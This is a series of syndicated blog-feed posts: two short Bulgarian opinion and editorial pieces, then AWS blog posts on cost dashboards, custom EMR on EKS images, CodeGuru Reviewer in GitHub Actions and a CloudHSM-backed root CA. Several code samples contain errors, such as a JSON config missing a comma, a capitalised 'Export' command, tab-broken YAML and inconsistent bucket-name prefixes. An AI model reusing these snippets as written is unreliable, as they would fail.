Защо не коментират как ще се издържат новите медицински хеликоптери

Post Syndicated from VassilKendov original http://kendov.com/medical_helicopter/

Защо не се коментира въпросът за издръжката на новите медицински хеликоптери, за които планираме да дадем 60 млн лева?
Най-вероятният отговор се крие във факта, че сме най-корумпираната държава в ЕС и следствията от това

_______________________________________________________________
– Покупката е по препоръка на ЕК, защото България е единствената държава в ЕС, която няма медицински хеликоптери
– С популяризирането на идеята са се нагажирали от политическа партия ДБ, които в момента трупат активност чрез популистки изказвания
– Тотална липса на експертност по отошение на поддържка или финансиране на подобна служба както пв правителството, така и в популяризиращите идеята
– Застрахователите са изключени от процеса на финансиране, а те са най-логичната институция за издръжка на подобно начинание, освен държавния бюджет
– Изключени са от процеса и общините за зимен и летен туризъм, които ще се най-големия печеливш от подобна инвестиция.
_________________________________________________________________

При проблем с банка или кредит – заявете среща
[contact-form-7]

VIP услуга за фирми – онлайн консултация при проблемен кредит

The post Защо не коментират как ще се издържат новите медицински хеликоптери appeared first on Kendov.com.

Седмицата в „Тоест“ (21–25 юни)

Post Syndicated from Тоест original https://toest.bg/editorial-21-25-june-2021/

Почти преполовихме 2021 година. Уви, продължаваме напред във времето все така най-бедни в Европейския съюз, най-малко ваксинирани, най-примижали пред заблатените ни институции и незряла демокрация. Според Емилия Милчева обаче ключов крайъгълен камък по пътя към промяната е числото 121. Поне толкова депутатски места са необходими на партиите, които заявяват амбиции да реформират държавата след 11…

Източник

Building a Showback Dashboard for Cost Visibility with Serverless Architectures

Post Syndicated from Peter Chung original https://aws.amazon.com/blogs/architecture/building-a-showback-dashboard-for-cost-visibility-with-serverless-architectures/

Enterprises with centralized IT organizations and multiple lines of businesses frequently use showback or chargeback mechanisms to hold their departments accountable for their technology usage and costs. Chargeback involves actually billing a department for the cost of their division’s usage. Showback focuses on visibility to make the department more cost conscientious and encourage operational efficiency.

Building a showback mechanism can be potentially challenging for business and financial analysts of an AWS Organization. You may not have the scripting or data engineering skills needed to coordinate workflows and build reports at scale. Although you can use AWS Cost Explorer as starting point, you may want greater customizability, larger datasets beyond a one-year period, and more of a business intelligence (BI) experience.

In this post, we discuss the benefits of building a showback dashboard using the AWS Cost and Usage Report (AWS CUR). You can track costs by cost center, business unit, or project using managed services. Using a showback strategy, you can consolidate and present costs to a business unit to show resource use over a set period of time for your entire AWS Organization. Building this solution with managed services allows you to spend time understanding your costs rather than maintaining the underlying infrastructure.

This solution highlights AWS Glue DataBrew to prepare your data into the appropriate format for dashboards. We recommend DataBrew because it provides a no-code environment for data transformation. It allows anyone to create dashboards similar to those built in the Cloud Intelligence Dashboards Workshop for your Organization.

Figure 1. QuickSight showback dashboard using CUR data transformed by Glue DataBrew and leveraging QuickSight insights

Figure 1. QuickSight showback dashboard using CUR data transformed by Glue DataBrew and leveraging QuickSight insights

Tags for cost allocation

The success of your showback dashboard partially depends on your cost allocation tagging strategy. Typically, customers use business tags such as cost center, business unit, or project to associate AWS costs with traditional financial reporting dimensions within their organization.

The CUR supports the ability to break down AWS costs by tag. For example, if a group of resources are labeled with the same tag, you’ll be able to see the total cost and usage of that group of resources. Read more about Tagging Best Practices to develop a tagging strategy for your organization.

A serverless data workflow for showback dashboards

You can build showback dashboards with managed services such as Amazon QuickSight, without the need to write any code or manage any servers.

Figure 2. A serverless architecture representing data workflow

Figure 2. A serverless architecture representing data workflow

AWS automatically delivers the data you need for showback dashboards through the CUR. Once this data arrives in an Amazon Simple Storage Service (S3) bucket, you can transform the data without the need to write any code by using DataBrew. You can also automatically identify the data schema, and catalog the data’s properties to run queries using Amazon Athena. Lastly, you can visualize the results by publishing and sharing dashboards to key stakeholders within your organization using Amazon QuickSight.

The key benefits of this approach are:

  • Automatic data delivery
  • No-code data transformation
  • Automatic cataloging and querying
  • Serverless data visualization

Let’s take a look at each in more detail.

Automatic data delivery

The CUR is the source for historical cost and usage data. The CUR provides the most comprehensive set of cost and usage data available and will include your defined cost allocation tags for your entire Organization. You configure CUR to deliver your billing data to an Amazon S3 bucket at the payer account level. This will consolidate data for all linked accounts. After delivery starts, Amazon updates the CUR files at least once a day.

No-code data transformation

You can use DataBrew to transform the data in the Amazon S3 bucket aggregating cost and usage according to your tagging strategy. DataBrew summarizes your data for discovery. You can also run transformations called “jobs” in DataBrew without writing any code, using over 250 built-in transforms. Figures 3 through 5 show several job examples.

Figure 3. DataBrew recipe action: rename column

Figure 3. DataBrew recipe action: rename column

Figure 4. DataBrew recipe action: Create column from function

Figure 4. DataBrew recipe action: Create column from function

Figure 5. DataBrew recipe action: fill missing values

Figure 5. DataBrew recipe action: fill missing values

For a full list of columns available in CUR, review the CUR Data Dictionary. Following is a list of relevant columns for an executive summary showback dashboard:

  • bill_billing_period_start_date
  • line_item_usage_account_id
  • line_item_line_item_type
  • product_product_name
  • product_product_family
  • product_product_transfer_type
  • savings_plan_savings_plan_effective cost
  • reservation_effective_cost
  • line_item_unblended_cost

Based on data refresh and business requirements, DataBrew can run a job on a recurring basis (for example, every 12 hours). This can be run at a particular time of day, or as defined by a valid CRON expression. This helps you automate your transformation workflows.

Automatic cataloging and querying

You can use a Glue crawler to automatically classify your data to determine the data’s format, schema, and associated properties. The crawlers write metadata to an AWS Glue Data Catalog to help data users find the data they need.

With the results in Amazon S3, and the metadata in the Glue Data Catalog, you can run standard SQL to queries with Athena. This will help you make more informed business decisions by tracking financial metrics and optimizing costs. This is done directly in Amazon S3 without having to move around data. Using standard SQL, you can create views that aggregate cost and usage by your defined tags.

Serverless data visualization

You can use Amazon QuickSight to create and share dashboards with your teams for cost visibility. QuickSight provides native integration with Athena and S3, and lets you easily create and publish interactive BI dashboards that include ML-powered insights. When building a showback dashboard such as the example in Figure 1, QuickSight authors create visuals and publish interactive dashboards.

Readers log in using your preferred authentication mechanism to view the shared dashboard. You can then filter data based on billing periods, account number, or cost allocation tags. You can also drill down to details using a web browser or mobile app.

Conclusion

In this blog, we’ve discussed designing and building a data transformation process and a showback dashboard. This gives you highly granular cost visualization without having to provision and manage any servers. You can use managed services such as AWS Glue DataBrew, Amazon Athena, and Amazon QuickSight to crawl, catalog, analyze, and visualize your data.

We recommend defining your organization tagging strategy to be able to view costs by tags. You can then get started by creating Cost and Usage Reports. With the data in Amazon S3, you can use the services described in this post to transform the data that works for your business. Additionally, you can get started today by experimenting with the Cloud Intelligence Dashboards Workshop. This workshop provides examples of visualizations that you can build using native AWS services on top of your Cost and Usage Report. You will be able to get cost, usage, and operational insights about your AWS Cloud usage.

Customize and Package Dependencies With Your Apache Spark Applications on Amazon EMR on Amazon EKS

Post Syndicated from Channy Yun original https://aws.amazon.com/blogs/aws/customize-and-package-dependencies-with-your-apache-spark-applications-on-amazon-emr-on-amazon-eks/

Last AWS re:Invent, we announced the general availability of Amazon EMR on Amazon Elastic Kubernetes Service (Amazon EKS), a new deployment option for Amazon EMR that allows customers to automate the provisioning and management of Apache Spark on Amazon EKS.

With Amazon EMR on EKS, customers can deploy EMR applications on the same Amazon EKS cluster as other types of applications, which allows them to share resources and standardize on a single solution for operating and managing all their applications. Customers running Apache Spark on Kubernetes can migrate to EMR on EKS and take advantage of the performance-optimized runtime, integration with Amazon EMR Studio for interactive jobs, integration with Apache Airflow and AWS Step Functions for running pipelines, and Spark UI for debugging.

When customers submit jobs, EMR automatically packages the application into a container with the big data framework and provides prebuilt connectors for integrating with other AWS services. EMR then deploys the application on the EKS cluster and manages running the jobs, logging, and monitoring. If you currently run Apache Spark workloads and use Amazon EKS for other Kubernetes-based applications, you can use EMR on EKS to consolidate these on the same Amazon EKS cluster to improve resource utilization and simplify infrastructure management.

Developers who run containerized, big data analytical workloads told us they just want to point to an image and run it. Currently, EMR on EKS dynamically adds externally stored application dependencies during job submission.

Today, I am happy to announce customizable image support for Amazon EMR on EKS that allows customers to modify the Docker runtime image that runs their analytics application using Apache Spark on your EKS cluster.

With customizable images, you can create a container that contains both your application and its dependencies, based on the performance-optimized EMR Spark runtime, using your own continuous integration (CI) pipeline. This reduces the time to build the image and helps predicting container launches for a local development or test.

Now, data engineers and platform teams can create a base image, add their corporate standard libraries, and then store it in Amazon Elastic Container Registry (Amazon ECR). Data scientists can customize the image to include their application specific dependencies. The resulting immutable image can be vulnerability scanned, deployed to test and production environments. Developers can now simply point to the customized image and run it on EMR on EKS.

Customizable Runtime Images – Getting Started
To get started with customizable images, use the AWS Command Line Interface (AWS CLI) to perform these steps:

  1. Register your EKS cluster with Amazon EMR.
  2. Download the EMR-provided base images from Amazon ECR and modify the image with your application and libraries.
  3. Publish your customized image to a Docker registry such as Amazon ECR and then submit your job while referencing your image.

You can download one of the following base images. These images contain the Spark runtime that can be used to run batch workloads using the EMR Jobs API. Here is the latest full image list available.

Release Label Spark Hadoop Versions Base Image Tag
emr-5.32.0-latest Spark 2.4.7 + Hadoop 2.10.1 emr-5.32.0-20210129
emr-5.33-latest Spark 2.4.7-amzn-1 + Hadoop 2.10.1-amzn-1 emr-5.33.0-20210323
emr-6.2.0-latest Spark 3.0.1 + Hadoop 3.2.1 emr-6.2.0-20210129
emr-6.3-latest Spark 3.1.1-amzn-0 + Hadoop 3.2.1-amzn-3 emr-6.3.0:latest

These base images are located in an Amazon ECR repository in each AWS Region with an image URI that combines the ECR registry account, AWS Region code, and base image tag in the case of US East (N. Virginia) Region.

755674844232.dkr.ecr.us-east-1.amazonaws.com/spark/emr-5.32.0-20210129

Now, sign in to the Amazon ECR repository and pull the image into your local workspace. If you want to pull an image from a different AWS Region to reduce network latency, choose the different ECR repository that corresponds most closely to where you are pulling the image from US West (Oregon) Region.

$ aws ecr get-login-password --region us-west-2 | docker login --username AWS --password-stdin 895885662937.dkr.ecr.us-west-2.amazonaws.com
$ docker pull 895885662937.dkr.ecr.us-west-2.amazonaws.com/spark/emr-5.32.0-20210129

Create a Dockerfile on your local workspace with the EMR-provided base image and add commands to customize the image. If the application requires custom Java SDK, Python, or R libraries, you can add them to the image directly, just as with other containerized applications.

The following example Docker commands are for a use case in which you want to install useful Python libraries such as Natural Language Processing (NLP) using Spark and Pandas.

FROM 895885662937.dkr.ecr.us-west-2.amazonaws.com/spark/emr-5.32.0-20210129
USER root
### Add customizations here ####
RUN pip3 install pyspark pandas spark-nlp // Install Python NLP Libraries
USER hadoop:hadoop

In another use case, as I mentioned, you can install a different version of Java (for example, Java 11):

FROM 895885662937.dkr.ecr.us-west-2.amazonaws.com/spark/emr-5.32.0-20210129
USER root
### Add customizations here ####
RUN yum install -y java-11-amazon-corretto // Install Java 11 and set home
ENV JAVA_HOME /usr/lib/jvm/java-11-amazon-corretto.x86_64
USER hadoop:hadoop

If you’re changing Java version to 11, then you also need to change Java Virtual Machine (JVM) options for Spark. Provide the following options in applicationConfiguration when you submit jobs. You need these options because Java 11 does not support some Java 8 JVM parameters.

"applicationConfiguration": [ 
  {
    "classification": "spark-defaults",
    "properties": {
        "spark.driver.defaultJavaOptions" : "
		    -XX:OnOutOfMemoryError='kill -9 %p' -XX:MaxHeapFreeRatio=70",
        "spark.executor.defaultJavaOptions" : "
		    -verbose:gc -Xlog:gc*::time -XX:+PrintGCDetails -XX:+PrintGCDateStamps 
			-XX:OnOutOfMemoryError='kill -9 %p' -XX:MaxHeapFreeRatio=70 
			-XX:+IgnoreUnrecognizedVMOptions"
    }
  }
]

To use custom images with EMR on EKS, publish your customized image and submit a Spark workload in Amazon EMR on EKS using the available Spark parameters.

You can submit batch workloads using your customized Spark image. To submit batch workloads using the StartJobRun API or CLI, use the spark.kubernetes.container.image parameter.

$ aws emr-containers start-job-run \
    --virtual-cluster-id <enter-virtual-cluster-id> \
    --name sample-job-name \
    --execution-role-arn <enter-execution-role-arn> \
    --release-label <base-release-label> \ # Base EMR Release Label for the custom image
    --job-driver '{
        "sparkSubmitJobDriver": {
        "entryPoint": "local:///usr/lib/spark/examples/jars/spark-examples.jar",
        "entryPointArguments": ["1000"],
        "sparkSubmitParameters": [ "--class org.apache.spark.examples.SparkPi --conf spark.kubernetes.container.image=123456789012.dkr.ecr.us-west-2.amazonaws.com/emr5.32_custom"
		  ]
      }
  }'

Use the kubectl command to confirm the job is running your custom image.

$ kubectl get pod -n <namespace> | grep "driver" | awk '{print $1}'
Example output: k8dfb78cb-a2cc-4101-8837-f28befbadc92-1618856977200-driver

Get the image for the main container in the Driver pod (Uses jq).

$ kubectl get pod/<driver-pod-name> -n <namespace> -o json | jq '.spec.containers
| .[] | select(.name=="spark-kubernetes-driver") | .image '
Example output: 123456789012.dkr.ecr.us-west-2.amazonaws.com/emr5.32_custom

To view jobs in the Amazon EMR console, under EMR on EKS, choose Virtual clusters. From the list of virtual clusters, select the virtual cluster for which you want to view logs. On the Job runs table, select View logs to view the details of a job run.

Automating Your CI Process and Workflows
You can now customize an EMR-provided base image to include an application to simplify application development and management. With custom images, you can add the dependencies using your existing CI process, which allows you to create a single immutable image that contains the Spark application and all of its dependencies.

You can apply your existing development processes, such as vulnerability scans against your Amazon EMR image. You can also validate for correct file structure and runtime versions using the EMR validation tool, which can be run locally or integrated into your CI workflow.

The APIs for Amazon EMR on EKS are integrated with orchestration services like AWS Step Functions and AWS Managed Workflows for Apache Airflow (MWAA), allowing you to include EMR custom images in your automated workflows.

Now Available
You can now set up customizable images in all AWS Regions where Amazon EMR on EKS is available. There is no additional charge for custom images. To learn more, see the Amazon EMR on EKS Development Guide and a demo video how to build your own images for running Spark jobs on Amazon EMR on EKS.

You can send feedback to the AWS forum for Amazon EMR or through your usual AWS support contacts.

Channy

Amazon CodeGuru Reviewer Updates: New Java Detectors and CI/CD Integration with GitHub Actions

Post Syndicated from Alex Casalboni original https://aws.amazon.com/blogs/aws/amazon_codeguru_reviewer_updates_new_java_detectors_and_cicd_integration_with_github_actions/

Amazon CodeGuru allows you to automate code reviews and improve code quality, and thanks to the new pricing model announced in April you can get started with a lower and fixed monthly rate based on the size of your repository (up to 90% less expensive). CodeGuru Reviewer helps you detect potential defects and bugs that are hard to find in your Java and Python applications, using the AWS Management Console, AWS SDKs, and AWS CLI.

Today, I’m happy to announce that CodeGuru Reviewer natively integrates with the tools that you use every day to package and deploy your code. This new CI/CD experience allows you to trigger code quality and security analysis as a step in your build process using GitHub Actions.

Although the CodeGuru Reviewer console still serves as an analysis hub for all your onboarded repositories, the new CI/CD experience allows you to integrate CodeGuru Reviewer more deeply with your favorite source code management and CI/CD tools.

And that’s not all! Today we’re also releasing 20 new security detectors for Java to help you identify even more issues related to security and AWS best practices.

A New CI/CD Experience for CodeGuru Reviewer
As a developer or development team, you push new code every day and want to identify security vulnerabilities early in the development cycle, ideally at every push. During a pull-request (PR) review, all the CodeGuru recommendations will appear as a comment, as if you had another pair of eyes on the PR. These comments include useful links to help you resolve the problem.

When you push new code or schedule a code review, recommendations will appear in the Security > Code scanning alerts tab on GitHub.

Let’s see how to integrate CodeGuru Reviewer with GitHub Actions.

First of all, create a .yml file in your repository under .github/workflows/ (or update an existing action). This file will contain all your actions’ step. Let’s go through the individual steps.

The first step is configuring your AWS credentials. You want to do this securely, without storing any credentials in your repository’s code, using the Configure AWS Credentials action. This action allows you to configure an IAM role that GitHub will use to interact with AWS services. This role will require a few permissions related to CodeGuru Reviewer and Amazon S3. You can attach the AmazonCodeGuruReviewerFullAccess managed policy to the action role, in addition to s3:GetObject, s3:PutObject and s3:ListBucket.

This first step will look as follows:

- name: Configure AWS Credentials
  uses: aws-actions/configure-aws-credentials@v1
  with:
    aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
    aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
    aws-region: eu-west-1

These access key and secret key correspond to your IAM role and will be used to interact with CodeGuru Reviewer and Amazon S3.

Next, you add the CodeGuru Reviewer action and a final step to upload the results:

- name: Amazon CodeGuru Reviewer Scanner
  uses: aws-actions/codeguru-reviewer
  if: ${{ always() }} 
  with:
    build_path: target # build artifact(s) directory
    s3_bucket: 'codeguru-reviewer-myactions-bucket'  # S3 Bucket starting with "codeguru-reviewer-*"
- name: Upload review result
  if: ${{ always() }}
  uses: github/codeql-action/upload-sarif@v1
  with:
    sarif_file: codeguru-results.sarif.json

The CodeGuru Reviewer action requires two input parameters:

  • build_path: Where your build artifacts are in the repository.
  • s3_bucket: The name of an S3 bucket that you’ve created previously, used to upload the build artifacts and analysis results. It’s a customer-owned bucket so you have full control over access and permissions, in case you need to share its content with other systems.

Now, let’s put all the pieces together.

Your .yml file should look like this:

name: CodeGuru Reviewer GitHub Actions Integration
on: [pull_request, push, schedule]
jobs:
  CodeGuru-Reviewer-Actions:
    runs-on: ubuntu-latest
    steps:
      - name: Configure AWS Credentials
        uses: aws-actions/configure-aws-credentials@v1
        with:
          aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
          aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          aws-region: us-east-2
	  - name: Amazon CodeGuru Reviewer Scanner
        uses: aws-actions/codeguru-reviewer
        if: ${{ always() }} 
        with:
          build_path: target # build artifact(s) directory
          s3_bucket: 'codeguru-reviewer-myactions-bucket'  # S3 Bucket starting with "codeguru-reviewer-*"
      - name: Upload review result
        if: ${{ always() }}
        uses: github/codeql-action/upload-sarif@v1
        with:
          sarif_file: codeguru-results.sarif.json

It’s important to remember that the S3 bucket name needs to start with codeguru_reviewer- and that these actions can be configured to run with the pull_request, push, or schedule triggers (check out the GitHub Actions documentation for the full list of events that trigger workflows). Also keep in mind that there are minor differences in how you configure GitHub-hosted runners and self-hosted runners, mainly in the credentials configuration step. For example, if you run your GitHub Actions in a self-hosted runner that already has access to AWS credentials, such as an EC2 instance, then you don’t need to provide any credentials to this action (check out the full documentation for self-hosted runners).

Now when you push a change or open a PR CodeGuru Reviewer will comment on your code changes with a few recommendations.

Or you can schedule a daily or weekly repository scan and check out the recommendations in the Security > Code scanning alerts tab.

New Security Detectors for Java
In December last year, we launched the Java Security Detectors for CodeGuru Reviewer to help you find and remediate potential security issues in your Java applications. These detectors are built with machine learning and automated reasoning techniques, trained on over 100,000 Amazon and open-source code repositories, and based on the decades of expertise of the AWS Application Security (AppSec) team.

For example, some of these detectors will look at potential leaks of sensitive information or credentials through excessively verbose logging, exception handling, and storing passwords in plaintext in memory. The security detectors also help you identify several web application vulnerabilities such as command injection, weak cryptography, weak hashing, LDAP injection, path traversal, secure cookie flag, SQL injection, XPATH injection, and XSS (cross-site scripting).

The new security detectors for Java can identify security issues with the Java Servlet APIs and web frameworks such as Spring. Some of the new detectors will also help you with security best practices for AWS APIs when using services such as Amazon S3, IAM, and AWS Lambda, as well as libraries and utilities such as Apache ActiveMQ, LDAP servers, SAML parsers, and password encoders.

Available Today at No Additional Cost
The new CI/CD integration and security detectors for Java are available today at no additional cost, excluding the storage on S3 which can be estimated based on size of your build artifacts and the frequency of code reviews. Check out the CodeGuru Reviewer Action in the GitHub Marketplace and the Amazon CodeGuru pricing page to find pricing examples based on the new pricing model we launched last month.

We’re looking forward to hearing your feedback, launching more detectors to help you identify potential issues, and integrating with even more CI/CD tools in the future.

You can learn more about the CI/CD experience and configuration in the technical documentation.

Alex

Create a portable root CA using AWS CloudHSM and ACM Private CA

Post Syndicated from J.D. Bean original https://aws.amazon.com/blogs/security/create-a-portable-root-ca-using-aws-cloudhsm-and-acm-private-ca/

With AWS Certificate Manager Private Certificate Authority (ACM Private CA) you can create private certificate authority (CA) hierarchies, including root and subordinate CAs, without the investment and maintenance costs of operating an on-premises CA.

In this post, I will explain how you can use ACM Private CA with AWS CloudHSM to operate a hybrid public key infrastructure (PKI) in which the root CA is in CloudHSM, and the subordinate CAs are in ACM Private CA. In this configuration your root CA is portable, meaning that it can be securely moved outside of the AWS Region in which it was created.

Important: This post assumes that you are familiar with the ideas of CA trust and hierarchy. The example in this post uses an advanced hybrid configuration for operating PKI.

The Challenge

The root CA private key of your CA hierarchy represents the anchor of trust for all CAs and end entities that use certificates from that hierarchy. A root CA private key generated by ACM Private CA cannot be exported or transferred to another party. You may require the flexibility to move control of your root CA in the future. Situations where you may want to move control of a root CA include cases such as a divestiture of a corporate division or a major corporate reorganization. In this post, I will describe one solution for a hybrid PKI architecture that allows you to take advantage of the availability of ACM Private CA for certificate issuance, while maintaining the flexibility offered by having direct control and portability of your root CA key. The solution I detail in this post uses CloudHSM to create a root CA key that is predominantly kept inactive, along with a signed subordinate CA that is created and managed online in ACM Private CA that you can use for regular issuing of further subordinate or end-entity certificates. In the next section, I show you how you can achieve this.

The hybrid ACM Private CA and CloudHSM solution

With AWS CloudHSM, you can create and use your own encryption keys that use FIPS 140-2 Level 3 validated HSMs. CloudHSM offers you the flexibility to integrate with your applications by using standard APIs, such as PKCS#11. Most importantly for this solution is that CloudHSM offers a suite of standards-compliant SDKs for you to create, export, and import keys. This can make it easy for you to securely exchange your keys with other commercially-available HSMs, as long as your configurations allow it.”

By using AWS CloudHSM to store and perform cryptographic operations with root CA private key, and by using ACM Private CA to manage a first-level subordinate CA key, you maintain a fully cloud-based infrastructure while still retaining access to – and control over – your root CA key pairs. You can keep the key pair of the root in CloudHSM, where you have the ability to escrow the keys, and only generate and use subordinate CAs in ACM Private CA. Figure 1 shows the high-level architecture of this solution.
 

Figure 1: Architecture overview of portable root CA with AWS CloudHSM and ACM Private CA

Figure 1: Architecture overview of portable root CA with AWS CloudHSM and ACM Private CA

Note: The solution in this post creates the root CA and Subordinate CA 0a but does not demonstrate the steps to use Subordinate CA 0a to issue the remainder of the key hierarchy that is depicted in Figure 1.

This architecture relies on a root CA that you create and manage with AWS CloudHSM. The root CA is generally required for use in the following circumstances:

  1. When you create the PKI.
  2. When you need to replace a root CA.
  3. When you need to configure a certificate revocation list (CRL) or Online Certificate Status Protocol (OCSP).

A single direct subordinate intermediate CA is created and managed with AWS ACM Private CA, which I will refer to as the primary subordinate CA, (Subordinate CA 0a in Figure 1). A certificate signing request (CSR) for this primary subordinate CA is then provided to the CloudHSM root CA, and the signed certificate and certificate chain is then imported to ACM Private CA. The primary subordinate CA in ACM Private CA is issued with the same validity duration as the CloudHSM root CA and in day-to-day practice plays the role of a root CA, acting as the single issuer of additional subordinate CAs. These second-level subordinate CAs (Subordinate CA 0b, Subordinate CA 1b, and Subordinate CA 2b in Figure 1) must be issued with a shorter validity period than the root CA or the primary subordinate CA, and may be used as typical subordinate CAs issuing end-entity certificates or further subordinate CAs as appropriate.

The root CA private key that is stored in CloudHSM can be exported to other commercially-available HSMs through a secure key export process if required, or can be taken offline. The CloudHSM cluster can be shut down, and the root CA private key can be securely retained in a CloudHSM backup. In the event that the root CA must be used, a CloudHSM cluster can be provisioned on demand, and the backup restored temporarily.

Prerequisites

To follow this walkthrough, you need to have the following in place:

Process

In this post, you will create an ACM Private CA subordinate CA that is chained to a root CA that is created and managed with AWS CloudHSM. The high-level steps are as follows:

  1. Create a root CA with AWS CloudHSM
  2. Create a subordinate CA in ACM Private CA
  3. Sign your subordinate CA with your root CA
  4. Import the signed subordinate CA certificate in ACM Private CA
  5. Remove any unused CloudHSM resources to reduce cost

To create a root CA with AWS CloudHSM

  1. To install the AWS CloudHSM dynamic engine for OpenSSL on Amazon Linux 2, open a terminal on your Amazon Linux 2 EC2 instance and enter the following commands:
    wget https://s3.amazonaws.com/cloudhsmv2-software/CloudHsmClient/EL7/cloudhsm-client-dyn-latest.el7.x86_64.rpm
    
    sudo yum install -y ./cloudhsm-client-dyn-latest.el7.x86_64.rpm
    

  2. To set an environment variable that contains your CU credentials, enter the following command, replacing USER and PASSWORD with your own information:
    Export n3fips_password=USER:PASSWORD
    

  3. To generate a private key using the AWS CloudHSM dynamic engine for OpenSSL, enter the following command:
    openssl genrsa -engine cloudhsm -out Root_CA_FAKE_PEM.key
    

    Note: This process exports a fake PEM private key from the HSM and saves it to a file. This file contains a reference to the private key that is stored on the HSM; it doesn’t contain the actual private key. You can use this fake PEM private key file and the AWS CloudHSM engine for OpenSSL to perform CA operations using the referenced private key within the HSM.

  4. To generate a CSR for your certificate using the AWS CloudHSM dynamic engine for OpenSSL, enter the following command:
    openssl req -engine cloudhsm -new -key Root_CA_FAKE_PEM.key -out Root_CA.csr
    

  5. When prompted, enter your values for Country Name, State or Province Name, Locality Name, Organization Name, Organizational Unit Name, and Common Name. For the purposes of this walkthrough, you can leave the other fields blank.

    Figure 2 shows an example result of running the command.
     

     Figure 2: An example certificate signing request for your private key using AWS CloudHSM dynamic engine for OpenSSL

    Figure 2: An example certificate signing request for your private key using AWS CloudHSM dynamic engine for OpenSSL

  6. To sign your root CA with its own private key using the AWS CloudHSM dynamic engine for OpenSSL, enter the following command:
    openssl x509 -engine cloudhsm -req -days 3650 -in Root_CA.csr -signkey Root_CA_FAKE_PEM.key -out Root_CA.crt
    

To create a subordinate CA in ACM Private CA

  1. To create a CA configuration file for your subordinate CA, open a terminal on your Amazon Linux 2 EC2 instance and enter the following command. Replace each user input placeholder with your own information.
    cat ‘{
      "KeyAlgorithm":"RSA_2048",
      "SigningAlgorithm":"SHA256WITHRSA",
      "Subject":{
        "Country":"US"
        "Organization":"Example Corp",
        "OrganizastionalUnit":"Sales",
        "State":"WA",
        "Locality":"Seattle",
        "CommonName":"www.example.com"
      }
    }’ > ca_config.txt
    

  2. To create a sample subordinate CA, enter the following command:
    aws acm-pca create-certificate-authority --certificate-authority-configuration file://ca_config.txt --certificate-authority-type "SUBORDINATE" --tags Key=Name,Value=MyPrivateSubordinateCA
    

    Figure 3 shows a sample successful result of this command.
     

    Figure 3: A sample response from the acm-pca create-certificate-authority command.

    Figure 3: A sample response from the acm-pca create-certificate-authority command.

For more information about how to create a CA in ACM Private CA and additional configuration options, see Procedures for Creating a CA in the ACM Private CA User Guide, and the acm-pca create-certificate-authority command in the AWS CLI Command Reference.

To sign the subordinate CA with the root CA

  1. To retrieve the certificate signing request (CSR) for your subordinate CA, open a terminal on your Amazon Linux 2 EC2 instance and enter the following command. Replace each user input placeholder with your own information.
    aws acm-pca get-certificate-authority-csr --certificate-authority-arn arn:aws:acm-pca:region:account:certificate-authority/12345678-1234-1234-1234-123456789012 > IntermediateCA.csr
    

  2. For demonstration purposes, you can create a sample CA config file by entering the following command:
    cat > ext.conf << EOF
    subjectKeyIdentifier = hash
    authorityKeyIdentifier = keyid,issuer
    basicConstraints = critical, CA:true
    keyUsage = critical, digitalSignature, cRLSign, keyCertSign
    EOF
    

    When you are ready to implement the solution in this post, you will need to create a root CA configuration file for signing the CSR for your subordinate CA. Details of your X.509 infrastructure, and the CA hierarchy within it, are beyond the scope of this post.

  3. To sign the CSR for your subordinate CA using the sample minimalist CA application OpenSSL-CA, enter the following command:
    openssl x509 -engine cloudhsm -extfile ext.conf -req -in IntermediateCA.csr -CA Root_CA.crt -CAkey Root_CA_FAKE_PEM.key -CAcreateserial -days 3650 -sha256 -out IntermediateCA.crt
    

Importing your signed Subordinate CA Certificate

  1. To import the private CA certificate into ACM Private CA, open a terminal on your Amazon Linux 2 EC2 instance and enter the following command. Replace each user input placeholder with your own information.
    aws acm-pca import-certificate-authority-certificate --certificate-authority-arn arn:aws:acm-pca:region:account:certificate-authority/1234678-1234-1234-123456789012 --certificate file://IntermediateCA.crt --certificate-chain file://Root_CA.crt
    

Shutting down CloudHSM resources

After you import your subordinate CA, it is available for use in ACM Private CA. You can configure the subordinate CA with the same validity period as the root CA, so that you can automate CA certificate management using and renewals using ACM without requiring regular access to the root CA. Typically you will create one or more intermediate issuing CAs with a shorter lifetime that chain up to the subordinate CA.

If you have enabled OCSP or CRL for your CA, you will need to maintain your CloudHSM in an active state in order to access the root CA private key for these functions. However, if you have no immediate need to access the root CA you can safely remove the CloudHSM resources while preserving your AWS CloudHSM cluster’s users, policies, and keys in an CloudHSM cluster backup stored encrypted in Amazon Simple Storage Service (Amazon S3).

To remove the CloudHSM resources

  1. (Optional) If you don’t know the ID of the cluster that contains the HSM that you are deleting, or your HSM IP address, open a terminal on your Amazon Linux 2 EC2 instance and enter the describe-clusters command to find them.
  2. Enter the following command, replacing cluster ID with the ID of the cluster that contains the HSM that you are deleting, and replacing HSM IP address with your HSM IP address.
    aws cloudhsmv2 delete-hsm --cluster-id cluster ID --eni-ip HSM IP address
    

To disable expiration of your automatically generated CloudHSM backup

  1. (Optional) If you don’t know the value for your backup ID, open a terminal on your Amazon Linux 2 EC2 instance and enter the describe-backups command to find it.
  2. Enter the following command, replacing backup ID with the ID of the backup for your cluster.
    aws cloudhsmv2 modify-backup-attributes --backup-id backup ID --never-expires
    

Later, when you do need to access your root CA private key in a CloudHSM, create a new HSM in the same cluster, and this action will restore the backup you previously created with the delete HSM operation.

Depending on your particular needs, you may also want to securely export a copy of the root CA private key to an offsite HSM by using key wrapping. You may need to do this to meet your requirements for managing the CA using another HSM or you may want to copy a cluster backup to a different AWS Region for disaster recovery purposes.

Summary

In this post, I explained an approach to establishing a PKI infrastructure using Amazon Certificate Manager Private Certificate Authority (ACM Private CA) with portable root CA private keys created and managed with AWS CloudHSM. This approach allows you to meet specific requirements for root CA portability that cannot be met by ACM Private CA alone. Before adopting this approach in production, you should carefully consider whether a portable root CA is a requirement for your use case, and review the ACM Private CA guide for Planning a Private CA.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the AWS Certificate Manager forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

J.D. Bean

J.D. Bean is a Senior Security Specialist Solutions Architect for AWS Strategic Accounts based out of New York City. His interests include security, privacy, and compliance. He is passionate about his work enabling AWS customers’ successful cloud journeys. J.D. holds a Bachelor of Arts from The George Washington University and a Juris Doctor from New York University School of Law.

Using GitHub Actions to deploy serverless applications

Post Syndicated from Julian Wood original https://aws.amazon.com/blogs/compute/using-github-actions-to-deploy-serverless-applications/

